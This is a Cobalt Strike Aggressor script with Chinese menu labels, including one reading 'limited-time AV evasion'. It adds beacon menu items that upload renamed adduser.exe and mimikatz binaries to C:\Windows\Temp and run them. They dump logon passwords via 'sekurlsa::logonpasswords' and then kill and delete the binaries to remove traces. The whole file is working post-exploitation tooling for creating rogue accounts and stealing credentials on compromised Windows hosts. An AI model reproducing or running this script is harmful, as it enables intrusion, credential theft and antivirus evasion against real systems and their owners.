menu "☆ 限时免杀"{
    menu "Adduser"{
        item "上传 adduser" {
		    blog($1, "\c9=========== 上传 adduser ==========");
            $bid = $1;
            $dialog = dialog("上传adduser", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &adduser);
            drow_text($dialog, "UploadPath",  "上传路径: ");
            dbutton_action($dialog, "上传");
            dialog_show($dialog);
        }
        sub adduser {
            bcd($bid, $3['UploadPath']);
            bupload($bid, script_resource("/scripts/BypassCxk/adduser.exe"));
        }
        item "运行 adduser" {
			blog($1, "\c9=========== 运行 adduser ==========");
            $bid = $1['@'];
            $dialog = dialog("运行adduser",%(exec => "adduser.exe", bid => $bid),&adduser_run);
            drow_text($dialog, "exec", "Exec: ");
            dbutton_action($dialog, "运行");
            dialog_show($dialog);
        }
        sub adduser_run {
            $exec = $3['exec'];
            bshell($bid, "$exec");
        }
        item "删除 adduser" {
			blog($1, "\c9=========== 删除 adduser ==========");
            $bid = $1['@'];
            bshell($bid, " del /f /s /q adduser.exe");
        }
        
    }
    menu "Mimikatz" {
        item "上传 mimikatz" {
			blog($1, "\c9=========== 上传 mimikatz ==========");
            $bid = $1;
            $dialog = dialog("上传mimikatz", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &mimi);
            drow_text($dialog, "UploadPath",  "上传路径: ");
            dbutton_action($dialog, "上传");
            dialog_show($dialog);   
        }
        sub mimi {
            bcd($bid, $3['UploadPath']);
            bupload($bid, script_resource("/scripts/BypassCxk/mimi.exe"));
        }
        item "logonpasswords" {
			blog($1, "\c9=========== logonpasswords ==========");
            $bid = $1;
            bshell($bid,"mimi.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit");
        }
        item "删除 mimikatz" {
			blog($1, "\c9=========== 删除 mimikatz ==========");
            $bid = $1['@'];
            bshell($bid, " taskkill -f /im mimi.exe & del /f /s /q mimi.exe");
        }        
    }
}